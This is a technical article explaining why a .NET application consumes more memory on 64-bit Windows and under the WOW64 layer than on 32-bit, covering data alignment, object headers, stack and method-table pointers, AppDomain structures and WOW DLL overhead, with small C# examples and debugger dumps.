Below are some instructions and suggestions to help you get started with a Kubeadm All-in-One environment on Ubuntu 18.04. Other supported versions of Linux can also be used, with the appropriate changes to package installation.
Requirements¶
System Requirements¶
The recommended minimum system requirements for a full deployment are:
16GB of RAM
8 Cores
48GB HDD
For a deployment without cinder and horizon the system requirements are:
8GB of RAM
4 Cores
48GB HDD
This guide covers the minimum number of requirements to get started.
All commands below should be run as a normal user, not as root. Appropriate versions of Docker, Kubernetes, and Helm will be installed by the playbooks used below, so there’s no need to install them ahead of time.
Warning
By default the Calico CNI will use
192.168.0.0/16 and
Kubernetes services will use
10.96.0.0/16 as the CIDR for services. Check
that these CIDRs are not in use on the development node before proceeding, or
adjust as required.
Host Configuration¶
OpenStack-Helm uses the hosts networking namespace for many pods including,
Ceph, Neutron and Nova components. For this, to function, as expected pods need
to be able to resolve DNS requests correctly. Ubuntu Desktop and some other
distributions make use of
mdns4_minimal which does not operate as Kubernetes
expects with its default TLD of
.local. To operate at expected either
change the
hosts line in the
/etc/nsswitch.conf, or confirm that it
matches:
hosts: files dns
Host Proxy & DNS Configuration¶
Note
If you are not deploying OSH behind a proxy, skip this step.
Set your local environment variables to use the proxy information. This
involves adding or setting the following values in
/etc/environment:"
Note
Depending on your specific proxy, https_proxy may be the same as http_proxy. Refer to your specific proxy documentation.
Your changes to /etc/environment will not be applied until you source them:
source /etc/environment
OSH runs updates for local apt packages, so we will need to set the proxy for apt as well by adding these lines to /etc/apt/apt.conf:
Acquire::http::proxy "YOUR_PROXY_ADDRESS:PORT"; Acquire::https::proxy "YOUR_PROXY_ADDRESS:PORT"; Acquire::ftp::proxy "YOUR_PROXY_ADDRESS:PORT";
Note
Depending on your specific proxy, https_proxy may be the same as http_proxy. Refer to your specific proxy documentation.
|
https://docs.openstack.org/openstack-helm/latest/install/developer/requirements-and-host-config.html
|
CC-MAIN-2022-33
|
refinedweb
| 391
| 53.1
|
I am trying to do speckle noise removal in satellite SAR image.I am not getting any package which does speckle noise removal in SAR image. I have tried pyradar but it works with python 2.7 and I am working on Anaconda with python 3.5 on windows. Also Rsgislib is available but it is on Linux. Joseph meiring has also given a Lee filter code on github but it fails to work. :
Kindly, can anyone share the python script for Speckle Filter or how to proceed for speckle filter design in python.
This is a fun little problem. Rather than try to find a library for it, why not write it from the definition?
from scipy.ndimage.filters import uniform_filter from scipy.ndimage.measurements import variance def lee_filter(img, size): img_mean = uniform_filter(img, (size, size)) img_sqr_mean = uniform_filter(img**2, (size, size)) img_variance = img_sqr_mean - img_mean**2 overall_variance = variance(img) img_weights = img_variance**2 / (img_variance**2 + overall_variance**2) img_output = img_mean + img_weights * (img - img_mean) return img_output
If you don't want the window to be a square of size x size, just replace
uniform_filter with something else (convolution with a disk, gaussian filter, etc). Any type of (weighted) averaging filter will do, as long as it is the same for calculating both
img_mean and
img_square_mean.
The Lee filter seems rather old-fashioned as a filter. It won't behave well at edges because for any window that has an edge in it, the variance is going to be much higher than the overall image variance, and therefore the weights (of the unfiltered image relative to the filtered image) are going to be close to 1.
An example:
from pylab import * import numpy as np img = np.random.normal(0.5, 0.1, (100,100)) img[:,:50] += 0.25 imshow(img, vmin=0, vmax=1, cmap='gray') imshow(lee_filter(img, 20), vmin=0, vmax=1, cmap='gray')
As you can see the noise reduction is very good in general, but much weaker along the edge.
I'm not familiar with SAR so I don't know if Lee filter has some features that make it particularly good for speckle in SAR, but you may want to look into modern edge-aware denoisers, like guided filter or bilateral filter.
|
https://codedump.io/share/FuKh5oA2xoaE/1/speckle--lee-filter-in-python
|
CC-MAIN-2017-43
|
refinedweb
| 375
| 61.97
|
.mail; 18 19 /** 20 * This class is used to send simple internet email messages without 21 * attachments. 22 * 23 * @since 1.0 24 * @version $Id: SimpleEmail.java 1606709 2014-06-30 12:26:06Z ggregory $ 25 */ 26 public class SimpleEmail extends Email 27 { 28 /** 29 * Set the content of the mail. 30 * 31 * @param msg A String. 32 * @return An Email. 33 * @throws EmailException see javax.mail.internet.MimeBodyPart 34 * for definitions 35 * @since 1.0 36 */ 37 @Override 38 public Email setMsg(final String msg) throws EmailException 39 { 40 if (EmailUtils.isEmpty(msg)) 41 { 42 throw new EmailException("Invalid message supplied"); 43 } 44 45 setContent(msg, EmailConstants.TEXT_PLAIN); 46 return this; 47 } 48 }
|
http://commons.apache.org/proper/commons-email/xref/org/apache/commons/mail/SimpleEmail.html
|
CC-MAIN-2016-36
|
refinedweb
| 114
| 62.44
|
Try the Nana C++ Library for your hobby project. It's free and open-source.
This is a pure C++ library written in standard C++, it makes you create a GUI program faster through HAND-CODING
Try the Nana C++ Library for your hobby project. It's free and open-source.
This is a pure C++ library written in standard C++, it makes you create a GUI program faster through HAND-CODING
What does it do better than Qt?
Ah! Like a not-ugly version of FLTK. That would be great actually. Qt has a fairly steep learning curve.
Qt is very powerful, Nana is lightweight.
Qt has its own syntax, Nana uses standard C++.
In fact, the main aim of Nana is providing comman concepts for programming, it should not break your thought and architecture of your design, thread-safe and thread-free features can make happy programming.
This is a pure C++ library, so lambda works if compiler is allowed.
Output "hello,world" if you click on the form.Output "hello,world" if you click on the form.Code:#include <nana/gui/wvl.hpp> #include <iostream> int main() { using namespace nana::gui; form fm; fm.make_event<events::click>( []{ std::cout<<"Hello, World"<<std::endl; } ); fm.show(); exec(); }
Last edited by jinhao; 12-08-2011 at 10:56 PM.
The reason Qt went with their own syntax (signals and slots) was because they thought, the way everyone else was doing it, with event callbacks (I haven't looked into your library, so I don't know if you are using that), was too un-intuitive. The whole point of the signals and slots system was to make it more intuitive, and more OO.
But I never understood that point...if you use functors instead of function pointers as expected in C++ code,..that does not remain a problem.
The second argument also does not sound very convincing to me....after all, you can just pass objects(or references to them) around for that.The second argument also does not sound very convincing to me....after all, you can just pass objects(or references to them) around for that.
Originally Posted by Qt docsOriginally Posted by Qt docs
Last edited by manasij7479; 12-08-2011 at 10:47 PM.
I don't think it's just the type system. The callback system assumes that the "interested party" is a function (or functor, which is conceptually a function), instead of an object, which is not OO.
I'm not really sure about this. UI design is really not my speciality.
Qt says a callback is a pointer to function, but IMO, callback is more like a pattern that is a implememtion of Dependency Injection.
nowadays, we have function objects.
It is an object, but it doesn't represent a function in the world. It represents an action, a function. It's not REALLY conceptually an object.
Functor is not a function, but it can be invoked by function-call syntax. So, we should not take care about whether it is a function, and it is a good solution to be a substitute for pointer to function in a common purpose library/framework.
Or we can also think of them as a function that is defined like an object. I think from places I have seen functors used, that's a more conceptually accurate description. It's not an object that represents something in the world. For example, you wouldn't call a functor Cat. Instead, it would be something like a Comparator, which really represents an operation/function.
So while that solves the technical problem of type safety, it still isn't conceptually OOP. That's just defining callback functions in another way.
What if it has multiple functions?
Classic OOP theory says objects should represent "things" with state (properties), and actions (methods).
If something only does one thing, isn't it a function?
|
https://cboard.cprogramming.com/projects-and-job-recruitment/144239-try-free-cplusplus-gui-library-your-hobby-project.html
|
CC-MAIN-2017-22
|
refinedweb
| 653
| 67.35
|
It's a joy to work in a multinational company ... travel frequently; it is more likely than not that your location tag will be out of sync.
As this is a something that happens to them once in a while I found it an interesting concept; fun enough to make it worth solving it.
So how does one establish his location? Short of installing a GPS on your machine, I would suggest checking your IP address and translating it based on one of the available databases.
The thought process goes as follows.
First things first, how do I establish my IP address? This seems to be trivial enough at first glance, query your network adapters and get the IP, right? But more likely than not, you're behind a NAT, and addresses like 10.0.0.2 or 192.168.0.2 (being private addresses) do not help the slightest bit.
So we need to see what the address is as visible from the net. Interesting enough there is more than one service to tell you, but probably the easiest to consume seems to be
public static string WhatIsMyIp() { // Create a new 'Uri' object with the specified string. Uri myUri = new Uri("">"); // Create a new request to the above mentioned URL. HttpWebRequest webRequest = (HttpWebRequest)HttpWebRequest.Create(myUri); webRequest.UserAgent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727)"; using (WebResponse webResponse = webRequest.GetResponse()) { using (StreamReader reader = new StreamReader( webResponse.GetResponseStream())) { // the response is actually the ip address the site is seeing return reader.ReadLine(); } } return string.Empty; }
Seems to get the job done.
Oddly enough there are few services doing anything like that. Initially I've used the MaxMind's GeoIP Lite City , but pushing 10MB of a database to everyone wanting to use it is not really a nice thing to do. It might be interesting solution for you, and I would encourage you to check it out if distribution file size is not a concern.
I started to look around some more, and interesting enough, found a service that turned out just perfect. GeoIP Tool.
Not only does it auto-detect the IP but it will also mesh it with it's geographical location database. The existing code got quickly replaced by a simple:
public static GeoLocation WhatIsMyGeoLocation() { // Create a new request to the geoiptool.com. // You can also retrieve the location // for an arbitrary ip by providing the IP= parametetr GeoLocation response = new Ge; }
This part is fairly easy and straightforward, all you really need to do is to install Skype (make sure you install the latest version, even some earlier 3.0 versions do not seem to make the app work 100% if at all) and import it's COM interface into Visual Studio. Then all you need is available through: Interop.SKYPE4COMLib to consume it.
You may want to consult the Skype API, but I found it pretty easy to get into even without any really extensive reading done.
using SKYPE4COMLib; namespace SkypeGeoLocation { public partial class MainForm : Form { private static Skype skype = new SkypeClass(); ... public static string SkypeName{ get { return skype.CurrentUserProfile.FullName; } set { if (skype.CurrentUserProfile.FullName!= value) { skype.CurrentUserProfile.FullName = value; } } } public static string SkypeDescription{ get { return skype.CurrentUserProfile.MoodText; } set { if (skype.CurrentUserProfile.MoodText != value) { skype.CurrentUserProfile.MoodText = value; } } } // ... public static void InitializeStructures(bool retryFailedRequests) { // ... // initialize skype if (!skype.Client.IsRunning) { skype.Client.Start(true, true); } } }
The application helps you maintain your location tag in your name so that whenever you travel to a different town your Skype name/description will reflect it.
Disclaimer: The application uses GeoIP Tool as its source of IP and geo-location. Visit their site for a wide variety of web based geo-location tools.
It does not contain.
In your Skype account set your name or description so that it has [] in it or press "Add location tab to..." in the application. Whenever the application will find that.
General
News
Question
Answer
Joke
Rant
Admin
|
http://www.codeproject.com/KB/IP/Skype_IP_and_geo_location.aspx
|
crawl-002
|
refinedweb
| 667
| 58.69
|
X-1.0rc3: Windows: Unittest from command line with -t: image files not found --- workaround
Bug Description
***** workaround
use Python's unitttest feature directly and run the scripts normally in IDE and with option -r from command line.
-------
I am running Sikuli X 1.0rc3 on Win7 Professional x64. My goal is to use the unit test features of Sikuli to write some automated tests. I have built several demo unit test scripts (testing notepad and an in house app) which run fine in the Sikuli IDE, but do not run correctly from the command line.
For example, here is a notepad test file I have written (this is the python code, obviously it has the pretty pictures in the IDE):
-------
notepad = App("notepad.exe")
def setUp(self):
self.notepad.
wait("
def tearDown(self):
self.notepad.
waitVanish(
def test_textarea_
type("hello world")
assert exists(
type("a",KEY_CTRL)
type("\n")
assert not exists(
def test_textarea_
type("hello world")
# fill clipboard for assert
type("a",KEY_CTRL)
type("c",KEY_CTRL)
assert Env.getClipboard() == "hello world"
type("\n")
# fill clipboard for assert
type("a",KEY_CTRL)
type("c",KEY_CTRL)
assert not Env.getClipboard() == "hello world"
-------
When I run this from the IDE (toggle Unit Tests from the View menu, then click the Unit Tests run button), everything runs fine and I get 2/2 tests run to completion. However, when I run it from the command line, the tests fail with "[error] UntitledNote.png looks like a file, but can't be found on the disk. Assume it's text." Full output below:
C:\Users\
[info] Sikuli vision engine loaded.
[info] Windows utilities loaded.
[info] VDictProxy loaded.
.[log] App.open notepad.exe(7868)
[error] UntitledNote.png looks like a file, but can't be found on the disk. Assume it's text.
[info] Text Recognizer inited.
[error] UntitledNote.png looks like a file, but can't be found on the disk. Assume it's text.
[error] UntitledNote.png looks like a file, but can't be found on the disk. Assume it's text.
...
So, it looks to me like this is some sort of pathing issue. I have tried adding the path to the .sikuli directory to the image path as the first line of the script based on another Q&A, but that did not work. Are there other steps I should try to troubleshoot this?
I'm also seeing this issue, would love to have it fixed - working a POC, trying to decide if Sikuli would work to replace a commercial product...
@ Raimund
I have the same issue when running Sikuli form the NetBeans IDE
I tried copying the images to the Sikuli folder containing the copy of the sikuli-script.jar copies to a different location ( due to known path issues with windows)
Still occurs.
Is there any type of workaround. I'm not clear about the automatic paths generated by Sikuli, I'd like to disable that feature since I'm working with an image bank I need to keep separate.
What I'd like is to have good ole setBundlePath working as it used to however any workaround would be greatly appreciated.
@ surfdork
--- running Sikuli form the NetBeans IDE
Using Python/Jython environment or Java?
--- I'd like is to have good ole setBundlePath
on the Python level, setBundlePath() should work as expected.
on Java level you can use the imagePath feature.
@ surfdork
you have to subscribe to a bug when adding comments and expecting an answer ;-)
no longer supported
some more information in the linked question
|
https://bugs.launchpad.net/sikuli/+bug/867636
|
CC-MAIN-2021-04
|
refinedweb
| 588
| 74.49
|
No rectified image output
Hello,
I am trying to generate a pointcloud from the depth camera of the robot pepper in conjunction with naoqi_driver, but I seem to get no output from the rectified image. When calling rostopic list I see both topics, /naoqi_driver_node/camera/depth/image_raw and /naoqi_driver_node/camera/depth/image_rect but when using rostopic hz, only image_raw has an actual output, and I can't figure out why. This is the code with which I'm trying to rectify the raw image data;
<node pkg="image_proc" type="image_proc" name="image_proc" ns="/naoqi_driver_node/camera/depth" />
Does anyone have an idea what I could be doing wrong? I'll happily provide further information if needed, I'm just not sure what else could affect this problem right now.
Thanks for any help in advance.
The image_proc node subscribes to _both_
image_rawand
camera_info. Are you seeing
camera_infomessages in the namespace you specified? If not, then the image_proc node will not publish any messages.
Yes, camera_info is putting out data, that's how I realised there was no output for image_rect, as the error mentioned they weren't in sync because there was no output, but I will doublecheck to confirm this first chance I get back in the lab on monday
I can now confirm that camera_info is publishing correctly, as is image_raw. But image_proc doesn't seem to be doing anything with image_raw.
Does anyone have an idea what could be wrong, or what I could be missing? I appreciate any help
|
https://answers.ros.org/question/304961/no-rectified-image-output/
|
CC-MAIN-2021-49
|
refinedweb
| 252
| 60.24
|
»
Game Development
Author
Java MMO: Sharing data between multiple clients and server
Jakobi Freeman
Greenhorn
Joined: Jan 01, 2012
Posts: 1
posted
Jan 01, 2012 18:07:00
0
Hello all, I couldn't find any answers online so I created an account and decided to post it here.
So basically, I'm developing an mmorpg and after I created the server and server thread to handle new connections, I couldn't think of a way to share the game world with multiple people. So basically, the world is in its own class/thread and will always be running,(well, as long as the server's running), and when you connect to the server, you get your own personal copy/instance of the game, and your character is "dropped" into the world. I'm not sure how to get the code for the world to the client, since they're on seperate machines, so that you can enter the world, however. Here's my server class:
package projectGA.server; import java.io.*; import java.net.*; public class Server{ static ServerSocket serverSocket; public static void main(String[] args) throws IOException{ runServer(); } public static void runServer(){ try{ serverSocket = new ServerSocket(9999); }catch(IOException e){ System.out.println("Server could not start properly..."); } System.out.println("Server has started up properly..."); Thread checkServerAlive = new Thread(new Runnable(){ public void run(){ try{ while(serverSocket.isBound()){ Thread.sleep(3000); System.out.println("Server is still alive..."); } }catch(InterruptedException e){ System.out.println("Could not check server status..."); } } }); checkServerAlive.start(); World world = new World(); world.start(); while(serverSocket.isBound()){ try{ Socket socket = serverSocket.accept(); ServerThread serverThread = new ServerThread(socket); serverThread.start(); }catch(IOException e){ System.out.println("Server could not accept new connection..."); } } try{ serverSocket.close(); }catch(IOException e){ System.out.println("Server could not close properly..."); } } }
My server thread class:
package projectGA.server; import java.net.*; public class ServerThread extends Thread{ private static Socket socket; private static String socketip; private static int socketport; public ServerThread(Socket s){ socket = s; socketip = s.getInetAddress().getHostAddress(); socketport = s.getPort(); } public void run(){ } }
My client class:
package projectGA.client; import java.io.*; import java.net.*; public class Client{ public static void main(String[] args) throws Exception{ runGame(); } static Socket socket; public static void runGame() throws IOException{ socket = new Socket("MININT-O31FG9S", 9999); DataOutputStream dos = new DataOutputStream(socket.getOutputStream()); dos.writeUTF("A new connection has been made..."); } }
My world class:
package projectGA.server; import java.awt.*; import javax.swing.*; public class World extends Thread{ ImageIcon i = new ImageIcon("sample.jpg"); Image icon = i.getImage(); public void run(){ JFrame f = new JFrame(); f.setSize(800,600); f.setAlwaysOnTop(true); f.setResizable(false); f.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); f.add(new WorldThread()); f.setVisible(true); } }
And finally my world thread class:
package projectGA.server; import java.awt.*; import javax.swing.*; import java.awt.event.*; public class WorldThread extends JPanel implements ActionListener{ Timer timer = new Timer(5, this); ImageIcon sample = new ImageIcon(getClass().getResource("sample.jpg")); Image ground = sample.getImage(); public WorldThread(){ timer.start(); setBackground(Color.WHITE); } public void paintComponent(final Graphics g){ Graphics2D g2d = (Graphics2D) g; g2d.drawImage(ground, 0, 0, null); } public void actionPerformed(ActionEvent e){ repaint(); } }
I placed all my server and world classes in a separate package, just so I could export the classes as separate runnable jar files. Again, I need the client to be able to get their own instance of the world and put their character into it.
~SauskueHitsugaya
Stephan van Hulst
Bartender
Joined: Sep 20, 2010
Posts: 3777
17
I like...
posted
Jan 01, 2012 18:37:13
0
Hi Jakobi. Welcome to CodeRanch.
I don't know how MMOs usually work, but I imagine that clients will already have their own copy of the world data, and they perform all the events and animations by themselves. What the server does is synchronize those happenings between different clients. The server sends information around about player/creature positions, actions, statuses and actions. The clients interpret that data by themselves.
So clients should download the "world" ahead of time, and should only be allowe to play with other clients if they have the same version of the world. I guess most MMOs do this by forcing clients to have the latest available version.
Randall Twede
Ranch Hand
Joined: Oct 21, 2000
Posts: 4347
2
I like...
posted
Jan 02, 2012 16:11:57
0
i'm no expert either but just to mention a couple of points. in some games(UO) players can build house and all players can see them. that is why some servers(shards) restrict the number of houses allowed(in this case some world data is on the server). also some servers(shards) allow older clients and some don't. if you have older client your play is limited however. some servers(shards) also require downloading patches to add to the client world view.
if you google around a bit you can probably find several sites devoted to this subject.
SCJP
Visit my
download page
Randall Twede
Ranch Hand
Joined: Oct 21, 2000
Posts: 4347
2
I like...
posted
Jan 03, 2012 08:53:19
0
UO is the only one i played a lot. i once(2005) downloaded the server(two free servers to choose from). it presented me with a "blank" world. all the buildings and trees and mountains etc but no creatures. i only played with it for a little while, but it let me "spawn" creatures(sheep, orcs, whatever) wherever i wanted. so it seems to me, in that game, the client and the server both have a copy of the "world".
after thinking about it for a while, i see a MVC
pattern
here.
the World is the Model, the Player is the View, the server-side code does all the Controller stuff and has a reference to the model and probably the view as well
Stephan van Hulst
Bartender
Joined: Sep 20, 2010
Posts: 3777
17
I like...
posted
Jan 03, 2012 09:32:43
0
A player isn't a view. A player is just an object in the world. The client has a view based on the position of its respective player in that world. I doubt the server has any such view.
Yes, the world is the model, and each client and server has a separate copy of it. However, the server is probably not the only controller. It's more of a mediator. If the server decided everything that should happen in a world, that would be way too much overhead, and the application would not scale at all.
Each client completely determines everything that happens in its own private copy of the world. It communicates its actions with the server, who then determines if those actions are valid and communicates them back to all clients.
For instance, let's think of battling a creature, together with other players. The world, the enemy and everything is already available to the client. You decide to attack the creature. While your player's animation starts hacking away, the server is being informed of this action. It then tells other clients you've started attacking. These clients too will then make their copy of your player attack the creature. The server then determines in its private copy when and how damage is dealt, and tells the clients about this. They update the situation accordingly.
I've very briefly tried a bit of World of Warcraft, to see what it was about. Occasionally, connection with the server would be bad, but I could still walk around and do stuff. However, after a few seconds, the client would try to sync with the server, and since there was no confirmation coming of the actions, they would be "rolled back", and my character would be repositioned to where it was when the connection problems started.
Randall Twede
Ranch Hand
Joined: Oct 21, 2000
Posts: 4347
2
I like...
posted
Jan 03, 2012 10:59:59
0
Stephan, i think you are basically correct. WOW is notorious for not only the problem you experienced but also for overheating processors.
Jakobi, if you are serious about writing such games, be prepared for a long learning process, since these are far from trivial programs.
i have heard there are "game engines" that do a lot of the work for you
subject: Java MMO: Sharing data between multiple clients and server
Similar Threads
closing thread and its childs
not able to connect...
two server and many client....
client / server (communication problem...)
MultiThreaded Programming: Killing Thread
All times are in JavaRanch time: GMT-6 in summer, GMT-7 in winter
JForum
|
Paul Wheaton
|
http://www.coderanch.com/t/563258/Game-Development/java/Java-MMO-Sharing-data-multiple
|
CC-MAIN-2015-22
|
refinedweb
| 1,438
| 66.33
|
import "github.com/rclone/rclone/fs/asyncreader"
Package asyncreader provides an asynchronous reader which reads independently of write
AsyncReader will do async read-ahead from the input reader and make the data available as an io.Reader. This should be fully transparent, except that once an error has been returned from the Reader, it will not recover.
func New(rd io.ReadCloser, buffers int) (*AsyncReader, error)
New returns a reader that will asynchronously read from the supplied Reader into a number of buffers each of size BufferSize It will start reading from the input at once, maybe even before this function has returned. The input can be read from the returned reader. When done use Close to release the buffers and close the supplied input.
func (a *AsyncReader) Abandon()
Abandon will ensure that the underlying async reader is shut down. It will NOT close the input supplied on New.
func (a *AsyncReader) Close() (err error)
Close will ensure that the underlying async reader is shut down. It will also close the input supplied on New.
func (a *AsyncReader) Read(p []byte) (n int, err error)
Read will return the next available data.
func (a *AsyncReader) SkipBytes(skip int) (ok bool)
SkipBytes will try to seek 'skip' bytes relative to the current position. On success it returns true. If 'skip' is outside the current buffer data or an error occurs, Abandon is called and false is returned.
WriteTo writes data to w until there's no more data to write or when an error occurs. The return value n is the number of bytes written. Any error encountered during the write is also returned.
Package asyncreader imports 7 packages (graph) and is imported by 4 packages. Updated 2019-07-28. Refresh now. Tools for package owners.
|
https://godoc.org/github.com/rclone/rclone/fs/asyncreader
|
CC-MAIN-2019-47
|
refinedweb
| 295
| 64.91
|
The intention of this article is to assist the readers realize why a same piece of code when executed on 32 bit environment, WOW (Windows on Windows) environment and 64 bit environment, consumes different amounts of memory.
It’s known and evident that running an application over WOW consumes more memory than 32 bit and running it on 64 bit consumes more than WOW and 32 bit environment.
Although there is no definite formula to find out the exact percentage increase in memory, the below discussion, by comparing 32 bit against 64 bit and 32 bit against WOW, helps understand what causes the memory usage to increase.
Reader who has the basic knowledge of WOW, 32 bit applications, 64 bit applications and platform porting background would make the most of this article.
To be on the safer side, if you decide to go through this article in any case, let us summarize WOW in one line.
"WOW simulates an environment of a different platform than the one which is sitting beneath, so that, an application which would have otherwise been incompatible will now run."
The primary change between 64 bit and 32 bit is the width of the address field, which has increased to 8 bytes from 4 bytes. So, evidently, more the number of address fields \ pointers in our application, more is the memory consumption in 64 bit. This document is as an exercise to traverse through a .Net process and explore all the underlying address fields/ pointers, present at different places with in a process, which ultimately remains responsible for the increase in memory consumption in a 64 bit process over a 32 bit process.
One of the primary reasons for the increase in memory is Data alignment. Data alignment is putting the data at a memory offset which is a multiple of the "WORD" size.
When a processor reads from or writes to the memory, it is in "WORD" sized chunks which is, 4 bytes in a 32 bit environment and 8 bytes in a 64 bit environment. When the size of a given object doesn't make up to the multiple of "WORD", the operating system will have to make it equal to the size of the very next multiple of "WORD". This is done by adding some meaningless information (Padding) at the end of the object.
In a 32 bit .Net process, the size of an object is at least 12 bytes and in a 64 bit .Net process, it is at least 24 bytes. The header which consists of two pointer types takes away 8 bytes and 16 bytes respectively in 32 and 64 bit environment. Even if the object doesn't have any members with in it, it consumes those additional 4 bytes \ 8 bytes for padding purpose which makes it's size 12 and 24 respectively in 32 bit and 64 bit process.
If an object in 32 bit environment having only one member which is short, the size of that object should be ideally size of header(8 bytes) + size of short (2 bytes). But, it ends up being size of the header (8bytes) + size of short (2 bytes) + padding bytes (2bytes) and hence data alignment leads to unavoidable wastage of memory. This wastage gets exaggerated in 64 bit environment simply because the WORD size becomes 8 bytes instead of 4 bytes. If an object in 64 bit has just one member which is a short it would take 24 bytes (16 bytes of header + 2 bytes of short + 6 bytes of padding \ adjustment). The wastage \padding is not a constant factor in each object instead it depends on the ‘Type’ and ‘Number’ of members of that object.
Eg: The object which contains just one ‘int’ and pays 24 bytes could have had 2 ‘int’s at the same cost resulting in zero wastage. An object which contains just one ‘short’ at the cost of 24 bytes could have 4 ‘short’s at the same cost and zero wastage.
Any .NET object would have a sync block (pointer to a sync block) and a type handler (Method table pointer). The header size increases by 8 bytes in 64 bit since the header essential has two pointers and pointer in 64 bit is 8 bytes against 4 byte in 32 bit environment. This means, if an application has 10000 objects (be it of any type) the memory straight away increases by 80,000 bytes between 32 and 64 bit environments, even if they are blank objects.
The stack segment of the process does contribute to the increase in memory in 64 bit as well. Each item \line in a stack has two pointers one for the callee address and the other being the return address. Just to get a feel of how significant it’s contribution is, let us consider the below program.
namespace Memory_Analysis {
class Program {
static void Main(string[] args) {
A obj = new A();
Console.ReadLine();
}
}
class A {
char Data1;
char Data2;
short Data3;
int Data4;
}
The stack segment for this code when executed would be having around 6000 lines(Measured by SOS). 6000 lines would result in 1200 addresses (pointers) fields because, as said above, each line in the stack would have two addresses a callee and a return address. Each address field leads to an increase of 4 bytes in 64 bit. So there will be an increase of (1200 * 4) 4800 bytes in the stack segment itself for the code segment which is as small as above.
Now coming to the method tables, each class which has at least one live instance would have a method table. Each method table would again have 2 address fields (entry point and description). If an application has 100 methods including all the classes within it, that would lead to ((100* 2) * 4) 800 bytes of increased memory in 64 bit just because of the method tables. Similarly, others who have address fields and contribute to the memory increase are GCHandles and FinalizationQueue.
Other than the stack and the heap, the assemblies that get loaded in to its AppDomain also contribute to the increase in memory. Below is a snap shot of the header of an AppDomain. As we can see, there are at least 15 address fields in the header.
Parent Domain: 0014f000
ClassLoader: 001ca060
System Domain: 000007fefa1c5ef0
LowFrequencyHeap: 000007fefa1c5f38
HighFrequencyHeap: 000007fefa1c5fc8
StubHeap: 000007fefa1c6058
Stage: OPEN
Name: None
Shared Domain: 000007fefa1c6860
LowFrequencyHeap: 000007fefa1c68a8
HighFrequencyHeap: 000007fefa1c6938
StubHeap: 000007fefa1c69c8
Stage: OPEN
Name: None
Assembly: 00000000011729a0
Domain 1: 00000000003a34a0
LowFrequencyHeap: 00000000003a34e8
HighFrequencyHeap: 00000000003a3578
StubHeap: 00000000003a3608
Stage: OPEN
SecurityDescriptor: 00000000003a4d40
Name: ConsoleApplication2.vshost.exe
After the header, the Appdomain would consist of a list of all the assemblies within the app domain. Under each assembly it again consists of a list of all the modules within that assembly.
Below is a portion of snap shot of the list of assemblies and the modules within each assembly. The below snap shot contains only that portion of the AppDomain which has reference to our sample "Memory_Analysis" assembly.
Assembly: 000000001ab3c330 [C:\Users\ing06996\Documents\Visual Studio 2008\Projects\ Memory_Analysis \ Memory_Analysis \bin\x64\Debug\ Memory_Analysis.exe]
ClassLoader: 000000001ab3c3f0
SecurityDescriptor: 000000001ab3b5b0
Module Name
000007ff001d1b08 C:\Users\ing06996\Documents\Visual Studio 2008\Projects\ Memory_Analysis \ Memory_Analysis \bin\x64\Debug\ Memory_Analysis.exe
The AppDomain which loads our sample application "Memory_Analysis" has to also load all the referenced dlls from our sample applications, including the .Net dlls like MSCOREE.dll and MSCORWKS.DLL. For each such referenced DLL, there would be entries similar to the one shown in the above snapshot.
Further to this, within each module, there would be several address fields as mentioned below in the snapshot
Assembly: 0090ae40
LoaderHeap: 00000000
TypeDefToMethodTableMap: 00170148
TypeRefToMethodTableMap: 00170158
MethodDefToDescMap: 001701a4
FieldDefToDescMap: 001701b4
MemberRefToDescMap: 001701c8
FileReferencesMap: 00170214
AssemblyReferencesMap: 00170218
MetaData start address: 0016207c
Upon measuring using SOS & WinDBG, a simple assembly like our "Memory_Analysis" had around 80 address fields loaded in the AppDomain which means an increase in memory by (80 * 4) 320 bytes . More the number of referenced assemblies and more the number of modules, higher will be the memory consumption.
After having compared 32 bit Vs 64 bit, let us now explore the differences between running a 32 bit process on a 32 bit environment and running a 32 bit process on a WOW environment.
WOW (Windows on Windows) as we know, is a simulated environment where a 64 bit Operating system provides a 32 bit environment so that the 32 bit processes can run seamlessly. The trigger point to this discussion is the fact that, running a 32 bit process on WOW takes more memory than running a 32 bit process on 32 bit environment. The discussion below, tries to explore some of the reasons why running on a WOW ends up consuming more memory. Before finding out the reasons for hike in memory, it is important to realize the magnitude of hike. Yet again there is no formula to find out the exact percentage increase in memory when run on WOW mode. Nevertheless, an example and some explanation might help us realize the magnitude of increase. Let us consider the below piece of code.
class MemOnWOW
{
int i;
private MemOnWOW()
{
i = 10;
}
static void Main(string[] args)
{
MemOnWOW p = new MemOnWOW();
System.Console.ReadLine();
}
}
This when built for a 32 bit platform and executed in a 32 bit environment consumes a total size of 80,596 KB and when executed over a WOW environment, consumes a total size of 115,128 KB, which means an increment of 34,532 KB. ** Total size: Total size includes Managed heap, Unmanaged Heap, Stack, Image, Mapped Files, Shareable, Private data and Paged tables. Now, let us list down the contribution to the increase in memory by each of the segments within the total memory.
The assemblies of the WOW, which are located at the location C:\windows\sysWOW64, add up to the increase in memory by around 12MB. These assemblies are required to bring up and execute the WOW environment within which the 32 bit process runs. Below is the list of some of the Dlls which are required to bring up the WOW environment and their roles.
Manages process and thread creation. Exception dispatching File system redirection Registry Redirection
Manages the 32-bit CPU context of each running thread inside Wow64. Provides processor architecture-specific support for switching CPU mode from 32-bit to 64-bit and vice versa.
Intercepts the GUI system calls.
It is important to understand the overhead added by WOW execution environment. You may want to go through the detailed explanation given by Mark Russinovich in his book Windows Internals.
Whenever there is a system call which is made to the underlying kernel (Call to the API exposed by the kernel) or whenever there is a call back from the kernel, the input parameters and output parameters have to be converted from 32 bit to 64 and 64 to 32 bit.
Wow which sits in between has the responsibility of converting the 32 bit user mode object to 64 bit user mode object before sending it to the kernel. Similarly, WOW will also have to convert 64 bit kernel objects to 32 bit kernel object before presenting it to the 32 bit user application. Similar conversions do take place when the kernel throws an exception object and it has to reach the user application. This is also called as "Exception hooking \ Exception Dispatching". Evidently, in the scenarios explained above where there are additional intermediate (user and kernel) objects created, memory is bound to increase. These conversions between kernel and user mode can also lead the performance degradations and not just the memory increase.
During the execution of a .Net application there could be several files which get memory mapped. Some of them are the globalization files (*.nls), font files (*.ttf) etc. When run under WOW, there are additional WOW related files which gets memory mapped and hence leading to memory hike. The number of files which gets memory mapped depends on the kind of assemblies referenced, resources used within the application etc. For the example "MemOnWOW" that we have considered above, the additional mapped files in the WOW mode are the globalization related .nls files which consume around 2.5 MB of excess memory.
